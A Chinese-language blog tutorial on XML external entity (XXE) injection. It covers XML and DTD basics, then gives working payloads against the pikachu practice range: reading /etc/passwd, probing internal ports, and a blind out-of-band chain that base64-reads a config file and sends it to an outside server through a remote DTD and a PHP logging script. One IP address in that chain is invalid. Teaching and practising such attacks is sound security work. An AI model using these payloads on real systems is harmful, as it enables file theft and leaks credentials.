网络安全之XXE漏洞总结(pikachu靶场案例解析)

已于 2023-12-15 12:48:36 修改
阅读量431 收藏 1
点赞数 7
分类专栏: 信息安全 文章标签: 网络安全 web安全 网络
于 2023-12-15 12:47:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61529962/article/details/135013543
版权

XXE漏洞是基于XML的漏洞先了解XML相关知识

XML知识

  • XML 指可扩展标记语言(EXtensible Markup Language)。

  • XML 是一种很像HTML的标记语言。

  • XML 的设计宗旨是传输数据,而不是显示数据。

    • html显示数据

  • XML 标签没有被预定义。您需要自行定义标签。

  • XML 被设计为具有自我描述性。

  • XML 是 W3C 的推荐标准

  • 作用

    • 存储数据

    • 传输数据

语法规则:

XML 文档必须有根元素
XML 声明(可选)
所有的 XML 元素都必须有一个关闭标签
XML 标签对大小写敏感
XML 必须正确嵌套
XML 属性值必须加引号
实体引用(同html)
> , <
XML 中的注释(同html)
在 XML 中,空格会被保留

例子:

<?xml version="1.0" encoding="UTF-8"?>
<note>
<to>Tove</to>
<from>Jani</from>
<heading>Reminder</heading>
<body>Don't forget me this weekend!</body>
</note>

命名规则:

XML 元素必须遵循以下命名规则:
名称可以包含字母、数字以及其他的字符
名称不能以数字或者标点符号开始
名称不能以字母 xml(或者 XML、Xml 等等)开始
名称不能包含空格

DTD

通过 DTD 验证的XML是合法的 XML

DTD(文档类型定义)的作用是定义 XML 文档的合法构建模块

DTD 可被成行地声明于 XML 文档中,也可作为一个外部引用

内部DTD

<!DOCTYPE 根标签元素 [元素申明]>
<?xml version="1.0"?>
<!DOCTYPE note [
<!ELEMENT note (a,b,c,d)>
<!ELEMENT a (#PCDATA)> //!ELEMENT:用于定义元素的名字
<!ELEMENT b (#PCDATA)> //#PCDATA ANY
<!ELEMENT c (#PCDATA)>
<!ELEMENT d (#PCDATA)>
]>
​
<note>
<a>苹果</a>
<b>香蕉</b>
<c>橘子</c>
<d>水果拼盘</d>
</note>

  • !DOCTYPE a (第二行)定义此文档是 note 类型的文档。

  • !ELEMENT note (第三行)定义 note 元素有四个元素:"a、b、c,、d"

  • !ELEMENT a (第四行)定义 a 元素为 "#PCDATA" 类型

  • !ELEMENT b (第五行)定义 b 元素为 "#PCDATA" 类型

  • !ELEMENT c (第六行)定义 c 元素为 "#PCDATA" 类型

  • !ELEMENT d (第七行)定义 d 元素为 "#PCDATA" 类型

PCDATA是会被解析器解析的文本。这些文本将被解析器检查实体以及标记。

CDATA是不会被解析器解析的文本。

外部DTD

<!DOCTYPE root-element SYSTEM "filename"> //这里的SYSTEM,就算造成整个漏洞的核心

先写一个申明文件666.dtd

<!DOCTYPE note [
<!ELEMENT note (a,b,c,d)>
<!ELEMENT a (#PCDATA)> //!ELEMENT:用于定义元素的名字
<!ELEMENT b (#PCDATA)> //#PCDATA ANY
<!ELEMENT c (#PCDATA)>
<!ELEMENT d (#PCDATA)>
]>

再写xml调用666.dtd

<?xml version="1.0"?>
<!DOCTYPE note SYSTEM "666.dtd">
<note>
<a>程咬金</a>
<b>貂蝉</b>
<c>通知</c>
<d>今天晚上,大战三百回合!</d>
</note>

DTD内部实体

实体是用于定义引用普通文本或特殊字符的快捷方式的变量。

  • 实体引用是对实体的引用。

  • 实体可在内部或外部进行声明。

  • <!ENTITY entity-name "entity-value">
    <?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE stu [
<!-- 元素声明 -->
<!ELEMENT stu (name, age, address)>
<!ELEMENT name (#PCDATA)>
<!ELEMENT age (#PCDATA)>
<!ELEMENT address (#PCDATA)>
<!-- 实体声明 -->
<!ENTITY name "亚瑟">
<!ENTITY age "18">
<!ENTITY address "对抗路">
]>
<!-- 实体调用 -->
<stu>
<name>&name;</name>
<age>&age;</age>
<address>&address;</address>
</stu>

DTD外部实体

先定义实体文件666.dtd

<!-- 元素声明 -->
<!ELEMENT stu (name, age, address)>
<!ELEMENT name (#PCDATA)>
<!ELEMENT age (#PCDATA)>
<!ELEMENT address (#PCDATA)>
<!-- 实体声明 -->
<!ENTITY name "亚瑟">
<!ENTITY age "18">
<!ENTITY address "对抗路">
]>

引用外部文件

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE stu SYSTEM "666.dtd">
​
<stu>
<name>&name;</name>
<age>&age;</age>
<address>&address;</address>
</stu>

参数实体

<!ENTITY % 实体名称 "实体的值">
或者
<!ENTITY % 实体名称 SYSTEM "URI">
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE root [
<!ENTITY % name SYSTEM "http://localhost/xxe/test2.php">
%name;<!--加载外部实体-->
]>

注意:参数实体只能在 DTD文件中被引用,其他实体在XML文档内引用。

参数实体 在DOCTYPE内 ,其他实体在外

PHP解析XML

传统方法

在<<<中定义xml内容

simplexml_load_string($xml,"SimpleXMLElement", LIBXML_NOENT | LIBXML_DTDLOAD );

将读取的值解析以对象的形式返回

<?php
header("Content-type:text/html;charset=utf-8");
$xml = <<<eof
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE root[
<!ENTITY name SYSTEM "file:///D:/www/xxe/data.txt">]>
<root>
<username>&name;</username>
</root>
eof;
$obj = simplexml_load_string($xml,"SimpleXMLElement", LIBXML_NOENT |
LIBXML_DTDLOAD );
echo $obj->username;
解析请求
<?php
header("Content-type:text/html;charset=utf-8");
$data = file_get_contents("php://input");
$xml = simplexml_load_string($data, "SimpleXMLElement", LIBXML_NOENT |
LIBXML_DTDLOAD);
echo $xml->username;
构造的payload
<?xml version = "1.0" encoding="UTF-8"?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<a>&xxe;</a>

案例1(有回显)

pikachu靶场

payload
//声明xml文件
<?xml version = "1.0" encoding="UTF-8"?>
//申明元素
<!DOCTYPE ANY [
//外部实体调用
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
​
<x>&xxe;</x>

探测内网
<?xml version = "1.0" encoding="UTF-8"?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "http://127.0.0.1:443">
]>
<x>&xxe;</x>
引入外部DTD

在本地服务器创建dtd文件,返回一个send

<!ENTITY send SYSTEM "file:///etc/passwd">

准备payload来引入本地dtd文件
<?xml version = "1.0" encoding="UTF-8"?>
<!DOCTYPE ANY [
<!ENTITY % file SYSTEM "http://47.108.223.48/xxe/test.dtd">
%file;
]>
<x>&send;</x>
传入目标漏洞

案例2(无回显)

pikachu靶场

无回显,步骤分为三部

  • 第一步写payload获取目标服务器的文件内容

    • <?xml version = "1.0"?>
<!DOCTYPE test [
//获取外部实体,把目标服务器的config.inc.php文件给file
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/html/inc/config.inc.php">
//再次获取外部实体,带着file到本地服务器,并调用自己准备的remote.dtd文件
<!ENTITY % dtd SYSTEM "http://127.108.623.48/xxe/remote.dtd">
%dtd;
%send;
]>

      读取经过base64编码的目标文件给%file,然后带着%file执行127.108.623.48/xxe/remote.dtd此文件,把%file存放在本地服务器,下一步在本地服务器创建文件来获取信息

  • 第二步在本地服务器写一个php文件用于将获取到到内容保存到本地服务器

    • <?php file_put_contents('1.txt',$_GET['data']);

      将%file写入到本地服务器的1.txt

  • 第三步在本地服务器写一个dtd用于获取我们从目标服务器获取的东西

    • <!ENTITY % payload "<!ENTITY &#x25; send SYSTEM
'http://47.108.223.48/xxe/remote.php?data=%file;'>">
%payload;

    由于是在本地要被目标服务器解析,所以要把%实体化转译,把从目标服务器获取到的%file给经过remote.php处理后赋给send,此时%payload="send"

最后将payload传入漏洞点,即可在本地生成1.txt,txt的内容就是目标服务器上的config.inc.php文件中的内容

€On my way•£
关注
  • 7
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
105-web漏洞挖掘之XXE漏洞1
08-03
1. 示例中是一般实体引用(即“&[name] 2. 示例中若使用FILE等其他协议,不一定是发起网络请求(源代码中定义的方法名 3. 不同的编程语言和XML解
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
内含xxe漏洞原理,以及该漏洞的多种利用方式,同时根据八个具体案例详细描述漏洞的利用方式。 【想要搭建vulnhub内靶场可关注博主,然后私聊我哦】 同时内含vulnhub中xxe lab:1靶场的过关记录 渗透思路: 由于网站...
XXE payload
黑面狐
08-16 7503
一、漏洞原理 当xml可以控制,并且后端没有过滤时就存在XXE漏洞。xml解析是引用外部实体。 二、漏洞测试 平时burp 抓包 可以在请求头添加  Content-type:application/xml 并添加 xml语句如果报错 或执行则有可能存在xxe漏洞,不断根据response fuzz即可 三、XXE payload 网上收集的payload -------------...
XXE漏洞原理和pikachu靶场实验
03-16 943
本文介绍XXE漏洞原理、危害和分类,以及pikachu靶场XXE4个实验。
xxe漏洞(xml外部实体注入漏洞)
xiaoheizi的博客
06-10 425
在知道存在回显后,可以尝试读取一些敏感目录,比如读取c:/windows/win.ini,它是每个windows系统都有的,linux系统的的话可以读取/etc/passwd,当然想要读取其他文件目录,只需更改绝对路径即可(file://协议只能用绝对路径)报错XXE是回显XXE攻击的一种特例,它与正常回显XXE的不同在于它在利用过程中服务器回显的是错误信息,可根据错误信息的不同判断是否注入成功。正常回显XXE是最传统的XXE攻击,在利用过程中服务器会直接回显信息,可直接完成XXE攻击。
Web安全 XXE漏洞的 测试和利用.(读取服务器的任何文件 和 收集服务器的内网信息.)
网络安全领域___专研者.
03-08 6255
XXE漏洞全称(XML External Entity Injection),即XML外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成:文件读取、命令执行、内网端口扫描、攻击内网网站,DOS攻击 等危害.(xxe漏洞触发的点往往是可以上传xml文件的位置的,没有对上传的xml文件进行过滤,导致可上传恶意xml文件.)
服务端安全之XML外部实体注入(XXE
好记性不如烂笔头
10-14 905
1. 什么是XXEXXE是XML external entity (XXE) injection 2. XXE是怎么发生的? XML规范中包含了一些不安全的特性,如果XML parser实现了这些特性,就存在安全隐患。XML external entity是一种自定义XML实体,其定义的值是从声明它们的DTD外部加载的。从安全性的角度来看,外部实体会存在潜在风险,因为它们允许根据文件路径或URL的内容定义实体。 3. XXE攻击的种类 3.1 利用XXE读取文件内容 为了实现这种攻击,有两种方式: (
XXE漏洞
huangyongkang666的博客
03-29 2324
XXE漏洞 1.漏洞简介 ​ XXE 漏洞全称XML External Entity Injection,即 XML 外部实体注入漏洞XXE 漏洞发生在应用程序解析 XML 输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。 xxe漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意 xml文件。 2.XML简介 ​ XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一
基于XXE漏洞网络安全分析与利用工具开发
最新发布
05-07
XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危書。 整体分二部分,第一部分是对22漏洞原理的分析、复现以及利用...
WEB安全XXE实体注入漏洞.pdf
12-12
WEB安全XXE实体注入漏洞
未知攻焉知防——XXE漏洞攻防.pdf
09-18
未知攻焉知防——XXE漏洞攻防 自动化 应急响应 云安全 网络信息安全 安全威胁
XXE漏洞详解与利用
qq_56438857的博客
08-11 7244
XML(Extensible Markup Language)意为可扩展性标记语言,我将介绍下 XML 的一些基础知识,方便你更好地理解漏洞原理。
pikachu--xxe
qq_43660551的博客
07-12 196
发现这里采用post方式传输数据,且没对xml参数进行过滤,simplexml_load_string()函数将用户传入的xml直接转换为SimpleXMLElement对象,故这里存在被篡改参数内容,造成xxe漏洞。现在很多语言里面对应的解析xml的函数默认是禁止解析外部实体内容的,从而也就直接避免了这个漏洞。以PHP为例,在PHP里面解析xml用的是libxml,其在≥2.9.0的版本中,默认是禁止解析xml外部实体内容的。写一个正经的xml。
XXE详解
qq_48904485的博客
03-22 5358
一、XML基础知识 1、XML简介: XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素 XML 和 HTML 为不同的目的而设计: XML 被设计用来传输和存储数据,其焦点是数据的内容。 HTML 被设计用来显示数据,其焦点是数据的外观。 HTML 旨在显示信息,而 XML 旨在传输信息。 2、XML 语法 1)XML 声明文件的可选部分,如果存在需要放在文
pikachu XXE (XML外部实体注入)(皮卡丘漏洞平台通关系列)
箭雨镜屋
02-17 6087
一、来自官方的介绍以及来自民间的扩展 1、pikachu官方简介 2、小女子之前画的脑图 3、两个个人感觉不错的博客 https://www.freebuf.com/articles/web/177979.html https://lalajun.github.io/2019/12/03/WEB-XXE/ ...
pikachu-XXE
koala_king的博客
03-21 149
根据提示构造 payload,让“pikachu”显示:<?> ]> &xxe;概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题"也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。既"xml外部实体注入漏洞"。随便输入一些内容,查看回显。
pikachuXXE漏洞
weixin_51446936的博客
06-18 1966
一、概述 XXE -“xml external entity injection”,即"xml外部实体注入漏洞"。 概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题" 也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。 现在很多语言里面对应的解析xml的函数默认是禁止解析外部实体内容的,从而也就直接避免了这个漏洞。 以PHP为例,在PHP里面解析xml用的是libxml,其在≥2.9.0的版本中,默认
pikachu-xxe
m0_62094846的博客
09-19 226
然后就能在本地的日志里看到test.txt的内容了(要开访问日志权限)但是这里面返回速度很快的,在网页上测试的时候还是回显很慢,感觉有点问题。但是扫描80端口会快,81会慢,因为80端口开放了。点 response received进行排序。在WWW下保存以test.dtd为名的文件。选择 response received。测试一下是否有xxe漏洞,且是否有回显。把echo $html 注释掉。两个回显都是这样的报错信息。填好数据,然后开始爆破。表示出来,再进行排序。
XXE漏洞原理及常见利用方式(以xxe-lab为示例)
weixin_43610673的博客
03-11 2122
这是一个有回显的XXE,这里读的文件是比较理想的,没有会被xml解析的字符,如果像下图中文件的内容一样就会引起xml解析报错(如Linux的/etc/fstab文件其中包含一些看起来像 XML 的字符),XML 解析器会尝试解析这些元素,但其不是一个有效的 XML 文档。而XXE是将XML元素注入变成外部实体注入,上面的基础知识部分已经提到了在DTD中声明外部实体,在xml中实体的作用相当于是一个已经定义的变量,可以在标签内使用,通过 & 符号进行引用。,是不会被解析解析的文本。...
pikachu靶场xxe漏洞
09-07
pikachu靶场xxe漏洞是指在该靶场中存在的XML外部实体攻击漏洞。通过构造恶意内容,攻击者可以利用这个漏洞读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。[1]这个靶场提供了一个接收XML数据的API,用于演示和学习xxe漏洞的原理、利用方法和思路。你可以在GitHub上找到该靶场的地址,并直接解压在www路径下进行使用。 在xxe漏洞的利用过程中,可以通过代码进行文件读取、内网探针或攻击内网应用、远程命令执行(RCE)、无回显读取文件等方式来实现攻击目标。同时也可以通过xxe绕过来绕过一些防御措施。 正常回显XXE是最传统的XXE攻击方式,服务器会直接回显信息,从而完成XXE攻击。而报错XXE是指在利用过程中会触发服务器的错误信息回显,进而获取敏感信息。所以,pikachu靶场xxe漏洞提供了一个学习和实践的平台,让人们能够更好地了解和防范xxe漏洞的危害。<span class="em">1</span><span class="em">2</span><span class="em">3</span><span class="em">4</span>

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值